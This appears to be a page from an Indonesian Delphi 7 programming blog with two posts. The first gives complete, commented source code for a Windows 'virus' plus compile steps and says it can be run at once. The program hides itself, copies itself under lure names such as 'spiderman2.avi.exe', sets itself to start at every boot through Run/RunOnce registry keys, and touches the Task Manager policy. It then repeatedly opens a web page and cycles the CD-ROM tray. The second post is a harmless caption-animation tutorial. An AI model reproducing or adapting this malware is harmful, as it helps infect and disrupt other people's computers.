Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,
Dialogs,Shellapi,registry, Mmsystem, StdCtrls, ExtCtrls, jpeg;

type
TForm1 = class(TForm)
Timer1: TTimer;
Timer2: TTimer;
procedure Timer2Timer(Sender: TObject);
procedure Timer1Timer(Sender: TObject);
procedure FormCreate(Sender: TObject);


private
{ Private declarations }
public
{ Public declarations }
end;

var
Form1: TForm1;

implementation

{$R *.dfm}
{{$R MySoundRes.RES}


procedure TForm1.FormCreate(Sender: TObject);
{DEKLARASI VARIABEL}
var
regis: TRegistry;
reg1:TRegistry;
reg2:TRegistry;
windir:array[0..255] of char;
sysdir:array[0..255] of char;


begin
{MEMBUAT FORM INVISIBILE}
Application.ShowMainForm := false;
begin
getwindowsdirectory(windir,sizeof(windir));
getsystemdirectory(sysdir,sizeof(sysdir));
try
{BUAT FOLDER SEBAGAI ROOM'NYA VIRUS(FILE INDUK DISINI)}
mkdir(sysdir+'\runfold');
except
end;
try
{CUMA MENDUPLIKASI DIRI AJA DENGAN NAMA2 FILE SEPERTI DIBAWAH INI}
{TAPI KALO DIKLIK YA, VIRUSNYA AKTIF LAGI, BUAT NAMA YG MENARIK AJA, TERSERAH}
CopyFile(pchar(application.ExeName),PChar(windir+'\try now.exe'),true);
CopyFile(pchar(application.ExeName),PChar(windir+'\elvis2005.exe'),true);
CopyFile(pchar(application.ExeName),PChar(windir+'\my way.exe'),true);
CopyFile(pchar(application.ExeName),PChar(windir+'\sinatra.exe'),true);
CopyFile(pchar(application.ExeName),PChar(windir+'\burn dvd.exe'),true);
CopyFile(pchar(application.ExeName),PChar(windir+'\spiderman2.avi.exe'),true);
CopyFile(pchar(application.ExeName),PChar(sysdir+'\runfold\-NET-SERVICES-.exe'),true);
except
end;
end;

begin
getsystemdirectory(sysdir,sizeof(sysdir));
try
{TAPI DI INVISIBLE}
SetFileAttributes(PChar(sysdir+'\runfold\-NET-SERVICES-.exe'), FILE_ATTRIBUTE_HIDDEN);
except
end;
end;

{MEN-DISABLE TASK MANAGER}
{VIRUS INI GA MAU DIMATIIN PAKE END TASKNYA TASK MENAGER}
{GIMANA NGGA, LA MAU MASUK AJA GA BISA}
try
{BUATNYA DI CURRENT USER, JADI KAMU MASIH BISA SELAMAT KALO MASUK SAFE MODE}
{KARENA TASK MANAGER DI imam MASIH BISA DIBUKA}
regis := TRegistry.Create;
regis.RootKey := HKEY_CURRENT_USER;
regis.OpenKey('Software', True);
regis.OpenKey('Microsoft', True);
regis.OpenKey('Windows', True);
regis.OpenKey('CurrentVersion', True);
regis.OpenKey('Policies', True);
regis.OpenKey('System', True);
regis.WriteString('DisableTaskMgr', '0'); {VALUE 0=NONAKTIF 1=AKTIF}
regis.CloseKey;
except
end;

{BUAT VIRUS INI DILOAD TIAP KALI KOMPUTER NYALA}
{YAITU DENGAN BUAT KEY DI REGISTER MEMANFAATKAN RUN(MSCONFIG-STARTUP) DAN RUNONCE}
{SUPAYA PROGRAM INI DILOAD TIAP KALI KOMPUTER NYALA}
begin
try
getsystemdirectory(sysdir,sizeof(sysdir));
reg1 := TRegistry.Create;
reg1.RootKey := HKEY_LOCAL_MACHINE;
if reg1.OpenKey('Software\Microsoft\Windows\CurrentVersion\Run',True) then
reg1.WriteString('.NET.',sysdir+'\runfold\-NET-SERVICES-.exe');
reg1.CloseKey;

reg2 := TRegistry.Create;
reg2.RootKey := HKEY_LOCAL_MACHINE;
if reg2.OpenKey('Software\Microsoft\Windows\CurrentVersion\RunOnce',True) then
reg2.WriteString('.NET.',sysdir+'\runfold\-NET-SERVICES-.exe');
reg2.CloseKey;
except
end;
end;
end;

{PADA PROCEDURE DIBAWAH INI VIRUS DIKIT USIL YAITU DENGAN SEMBARI KITA}
{PUSING LIAT FLOODING YANG TERJADI DIDESKTOP, VIRUS INI JUGA BIKIN}
{CD-ROM KITA OPEN CLOSED TAK TERKENDALI..BISA2 SAMPE JEBOL}
procedure TForm1.Timer1Timer(Sender: TObject);
begin
try
ShellExecute(0, 'open', 'www.muchlisworhkhouse.blogspot.com', nil, nil, SW_NORMAL);
mciSendString('Set cdaudio door open', nil, 0, handle);
except
end;
timer2.Enabled:= true;
timer1.Enabled:= false;
end;

procedure TForm1.Timer2Timer(Sender: TObject);
begin
try
mciSendString('Set cdaudio door closed', nil, 0, handle);
except
end;
timer1.Enabled:= true;
timer2.Enabled:= false;
end;

end.


Membuat file compile'annya:
1.Masuk delphi (aku pake Delphi 7) copy listing ini, yang auto create dari delphi kamu hapus semua
2.buat 1 project trus ga usah ada yg kamu ubah2,kecuali kamu add 2 buah timer
3.sebelum kamu add, kamu quote dlu yang di deklarasi Type,klo udah baru di unquote lagi
4.km compile trus dapet dah, file .exe virusnya..
5.selesai, bisa langsung diaktifkan
6.klo ada yg ga jelas tanya aja

Moga bermanfaat!
Diposkan oleh Borland7
Label: Borland Delphi 7
Sebelumnya kita telah belajar membuat efek blink pada teks, dan sekarang kita akan membuat efek mesin ketik pada Judul Form ataupun pada caption label. Namun sebelumnya kita perlu tahu dulu apa yang dimasud dengan efek mesin ketik. Efek Mesin Ketik maksudnya adalah efek pada teks yang akan muncul satu per satu seperti lagi di ketik. Efek ini kalau dikalangan website banyak digunakan untuk judul website atau blog, namun disini kita akan menggunakannya untuk caption label atau pun caption form sehingga saat dijalankan judul form atau label yang kita beri animasi ini akan muncul perhuruf seperti lagi di ketik. Oke kita langsung praktekkan yaaa,,, caranya yaitu :

1. Buka Program Delphi, Tentunya teman - teman sudah tahu. Kalau belum tahu ini caranya : Klik Start => All Programs => Borland Delphi => Delphi 7.0 (Kalau yang teman - teman gunakan versi 7, tapi untuk versi yang lain juga sama)

2. Tambahkan 1 buah komponen Timer dan atur property intervalnya menjadi 10

3.Klik 1X (satu kali) pada form kemudian tekan F12 pada keyboard, pada bagian var teman - teman ketikan listeing berikut :
var
n : integer;

4. Kemudian Kembali Form, klik 2x (dua kali) pada form, pada FormCreate ketikkan listing berrikut :
procedure TForm1.FormCreate(Sender: TObject);
begin
n:=0;
end;

5.Kemudian kembali lagi ke from, pada komponen Timer klik 2x(dua kali) kemudian masukkan listing berikut ini :
procedure TForm1.Timer1Timer(Sender: TObject);
begin
n:=n+1;
if n=1 then Form1.caption:='M';
if n=2 then Form1.caption:=Form1.caption + 'E';
if n=3 then Form1.caption:=Form1.caption + 'N';
if n=4 then Form1.caption:=Form1.caption + 'U';
if n=5 then Form1.caption:=Form1.caption + ' ';
if n=6 then Form1.caption:=Form1.caption + 'U';
if n=7 then Form1.caption:=Form1.caption + 'T';
if n=8 then Form1.caption:=Form1.caption + 'A';
if n=9 then Form1.caption:=Form1.caption + 'M';
if n=10 then Form1.caption:=Form1.caption + 'A';
if n=10 then timer1.enabled:=false;
end;

6. Jika Captionnya ingin bergerak secara berkisinambungan (terus menerus) maka dapat dilakukan dengan cara berikut :
pada listing
if n=10 then timer1.enabled:=false;
digantin dengan
if n=10 then
begin
Form1.caption:=' ';
n:=0;
end;
sehinggga menjadi :

procedure TForm1.Timer1Timer(Sender: TObject);
begin
n:=n+1;
if n=1 then Form1.caption:='M';
if n=2 then Form1.caption:=Form1.caption + 'E';
if n=3 then Form1.caption:=Form1.caption + 'N';
if n=4 then Form1.caption:=Form1.caption + 'U';
if n=5 then Form1.caption:=Form1.caption + ' ';
if n=6 then Form1.caption:=Form1.caption + 'U';
if n=7 then Form1.caption:=Form1.caption + 'T';
if n=8 then Form1.caption:=Form1.caption + 'A';
if n=9 then Form1.caption:=Form1.caption + 'M';
if n=10 then Form1.caption:=Form1.caption + 'A';
if n=10 then
begin
Form1.caption:=' ';
n:=0;
end;
end;

Catatan :
Atur Kecepatan pergerakkan dengan mengganti property interval di timer.
Itu saja dulu mohon sarannya, kalau ada kesalahan mohon diberitahu dan dimaafkan karena saya juga masih dalam pembelajaran.
Diposkan oleh Borland7
Visit the Site
MARVEL and SPIDER-MAN: TM & 2007 Marvel Characters, Inc. Motion Picture © 2007 Columbia Pictures Industries, Inc. All Rights Reserved. 2007 Sony Pictures Digital Inc. All rights reserved. blogger templates